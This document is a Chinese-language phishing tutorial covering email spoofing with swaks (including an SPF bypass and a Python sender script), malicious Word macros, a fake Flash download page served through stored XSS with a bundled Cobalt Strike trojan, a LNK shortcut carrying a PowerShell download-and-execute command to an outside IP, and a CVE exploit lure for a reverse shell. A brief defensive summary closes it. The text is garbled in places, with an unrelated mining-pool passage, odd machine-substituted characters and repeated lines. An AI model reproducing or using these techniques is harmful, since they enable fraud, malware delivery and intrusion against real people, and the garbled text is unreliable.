一、钓鱼手艺
0X00 邮箱伪造手艺 0X01 Swaks伪造邮件 swaks堪称SMTP协议的瑞士军刀,使用它我们可以无邪的操作SMTP 协议报文 通常最简朴
的发送下令:swaks --to user@example.com --server test-server.example.net
同时,SPF检测会FAIL
0x01 smtp2go
smtp2go主要是相当于邮件托管,可以分发子账户举行发送。地址:https://support.smtp2go.com/hc/en-gb(邮箱注册)通俗账
户可以免费发1000封邮件。分配好账户后,可以通过swaks举行登录发送邮件:
0x02 swaks发送邮件
swaks --to test@gmail.com --from admin@qq.com --ehlo gmail.com --body hello --server mail.smtp2go.com -p 2525 -au -ap
为此,互联网上降生了「矿池」。小我私人用户在挖矿历程中将挖矿客户端毗连到更大的矿池服务器。与其他小我私人矿工抱团挖掘比特币。
当大矿池挖掘到比特币时,凭证算力孝顺对差异的客户端举行赚钱分成。绝大多数矿池会提供用户专用的挖矿软件和钱包地址。
可是上面这个邮件无法绕过SPF
0x03 SPF验证原理
若是mail.smtp2go.com是我的邮件服务器,那么gmail服务器收到的 源IP也一定是mail.smtp2go.com的IP。gmail会校验邮件发送
者的IP是否存在于smtp.from的域名spf设置列内外。而上面这条下令:
waks --to test@gmail.com --from admin@qq.com --ehlo gmail.com --body hello --server mail.smtp2go.com -p 2525 -au -ap
smtp.from就是admin@qq.com,和mail.smtp2go.com的IP一定差异,所 以SPF校验失败,而校验失败的邮件,会有很高的几率被
扔到垃圾邮件 中。默认情形下,若是未设置Mail.From也就是邮件头的From,则会使 用smtp.from作为Mail.From
0x04 绕过SPF
由于邮件显示的是Header中的From不是smtp.from,因此可以将 smtp.from设置为正常的邮件服务器地址,伪造一个Mail.From即可
swaks --to ceshi@aliyun.com --from xx@smtp2go.com --h-From: '治理员' --ehlo gmail.com --body hello --server mail.smtp2go.com
-p 2525 -au -ap
Gmail吸收到这封邮件后,会校验--from xx@smtp2go.com 中的 smtp2go.com是否即是mail.smtp2go.com的IP,由于是相等的,
以是完成了 SPF的校验。而DKIM是校验邮件完整性的,smtp2go与Gmail直接使用的是 TLS,不会发生什么问题
0x05 Header
swaks支持自界说某些Header,参数如下:
swaks --header-
若是我想去除Mailer特征,就可以这么做:
swaks --header-X-Mailer gmail.com --to ceshi@aliyun.com --from xx@smtp2go.com --h-From: '治理员' --ehlo gmail.com --body
hello --server mail.smtp2go.com -p 2525 -au -ap
0x06 附件、钓鱼
swaks --header-X-Mailer gmail.com --to ceshi@aliyun.com --from xx@smtp2go.com --h-From: '治理员' --ehlo gmail.com --body
hello --server mail.smtp2go.com -p 2525 -au -ap --attach /tmp/sss.rtf
定制发送:
swaks --data /tmp/mail.data --header-X-Mailer gmail.com --to ceshi@aliyun.com --from xx@smtp2go.com --h-From: '治理员 '
--ehlo gmail.com --body hello --server mail.smtp2go.com -p 2525 -au -ap --attach /tmp/sss.rtf/tmp/mail.data中是原始的邮件
报文。
0x07 Python实现代码
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import smtplib
from email.mime.text import MIMEText
from email.header import Header
mail_host="mail.smtp2go.com"
mail_user=""
mail_pass=""
sender = 'test@smtp2go.com'
receivers = ['ceshi@gmail.com']
message = MIMEText('Hello World', 'plain', 'utf-8')
message['From'] = Header("from@qq.com", 'utf-8')
message['To'] = Header(receivers[0], 'utf-8')
subject = 'SMTP 邮件测试'
message['Subject'] = Header(subject, 'utf-8')
try:
smtpObj = smtplib.SMTP()
smtpObj.connect(mail_host, 25)
smtpObj.login(mail_user,mail_pass)
smtpObj.sendmail(sender, receivers, message.as_string())
print "Success"
except smtplib.SMTPException:
print "Error"s附件携马手艺
二、Office钓鱼
0X01打开Word文档,点击 “Word 选项 — 自界说功效区 — 开发者工具(勾选) — 确定”
0X02编写主体内容后,点击 “开发工具 — Visual Basic”,双击 “ThisDocument” ,将原有内容所有清空,然后将刚刚天生的宏
恶意代码所有粘贴进去,生涯并关闭该 VBA 编辑器 。
0X03然后将文档发送给别人,内容可以是任何诱惑性的文字,好比通知等,可以针对目的举行相对的文字说明
Office正常情形下是不启用的宏的,可以诱导用户启用
可以通过如下等文字心里体现
当点击启用宏的时间,木马就上线了
三、XSS+flash钓鱼
源码地址:https://github.com/r00tSe7en/Fake-flash.cn 伪造后是下面这个样子,虽然我这是半制品,拭魅战历程中需要购置相似性
特殊强的域名用来疑惑
修改木马下载地址
0x03 木马天生
在flash官网找到安装包,下载下来与木马捆绑在一起。
去天生自己的木马,这里使用 Cobalt Strike作为演示
将两个文件放在一起
同时选中官方文件和木马,用winrar建设自解压文件。
选择高级-自解压选项-更新-笼罩所有文件
设置解压路径
设置提取后运行的文件,划分把正常法式和木马运行路径填入
设置模式所有隐藏
点击确定后天生文件
为了更具有疑惑性使用 ResourceHacker修改图标,将文件拖入后选择操作-替换图标
选择正常的flash
然后放在目录下
0x03 使用
找到有存储型xss误差的网站,这里以当地dvwa靶场为例,插入以下代码
由于是存储型XSS,以是每次会见这个页面都市弹窗而且点击确定后强制跳转至我们的钓鱼页面
点击下载后,运行exe,我们就乐成了。
乐成上线
四、快捷方式钓鱼
nk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以利便使用者快速的挪用。
lnk钓鱼主要将图标伪装成正常图标,可是目的会执行shell下令。
同样使用Cobalt Strike天生响应的木马代码
会获得一串powershell代码
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.121.156:80/a'))"
然后新建快捷方式将上面的powershell语句填入
下一步,然后自己命名一下,点击完成。
可以更改图标使其更具有诱惑性
当受害者双击之后就会自动执行我们的恶意payload,从目的网站下载并执行。 最终被获得 shell。
伪装完毕
发送给目的点击后直接上线
四-二诱骗钓鱼:同样,使用Cobalt Strike天生一个恶意木马法式
使用最最先提到的邮箱伪造手艺或者通过其他手段拿到内部职员的邮箱账号发送假的通知
当目的群体下载附件运行以后,就上线了
同样,上面提到的word也可以用这种方式来举行钓鱼攻击
五、0day/nday误差钓鱼
双杀误差 0x00 将CVE-2018-8147使用法式下载到当地而且进入相关目录
本机IP:192.168.121.129
0x01执行下令天生payload
开启web服务而且将exp.html和test.rtf复制到web服务目录下面
攻击方式一:
0x00当地监听上述的7777端口
0x01然后将地址发送给目的用户诱导其点开
对应网页会报错
视察我们的监听机械
乐成反弹shell
可以执行恣意下令
攻击方式二:
刚刚的文档,我们可以更名为具有诱惑性的问题
同样开启监听
发送用户
诱导点开 然后同样会反弹shell
总结
网络钓鱼已成为实验电子犯罪的更常见手段。据统计,网络钓鱼电子邮件在全球邮件流量中所占的份额凌驾50%,
用户的15%至少遭受一次网络钓鱼攻击,攻击公司的比例为85%。约莫
80%的攻击是偷窃资金。大多数网络钓鱼运动都是短期的。
每次研究职员想出任何发现和预防网络钓鱼的想法时,网络钓鱼者都市使用当前解决方案中发现的误差来更改其攻
击战略。网络钓鱼诈骗可以通过恶意软件或社会工程来执行,后者指的是
使用冒充的网页或电子邮件。
当前,没有任何工具可提供100%的防护以防止网络钓鱼攻击,由于这些攻击大多数都是人为因素。由于区块链是一
项需要投资的快速生长的新手艺,因此对区块链项目的网络钓鱼攻击数
量每年都将增添。
受网络钓鱼攻击影响的职员和公司最常见的错误是:
1)对基础设施的掩护不足;
2)转到从信件到虚伪网站的链接;
3)从圈套新闻中启动恶意剧本;
4)信托诓骗性的广告运动,保证快速轻盈的收入;
5)社交网络中的掩护水平不足;
6)对包罗SSL证书的网站的太过信托;
7)投资ICO时对项目的相识不足;
8)无法使用现代的防御网络钓鱼攻击的要领(防病毒,特殊扩展和附加组件)。
整体解决方案:
1)使用书签取代链接;
2)使用带有反网络钓鱼扩展名的浏览器,
3)安装反网络钓鱼软件,
4)榨取点击链接和下载可疑附件;
5)使用服务之前对SSL证书举行身份验证;
6)宣布加密钱包的离线副本;
7)使用双重身份验证重大密码(至少14个符号);
8)拒绝公共Wi-Fi,使用清静网关。
会获得一串powershell代码
会获得一串powershell代码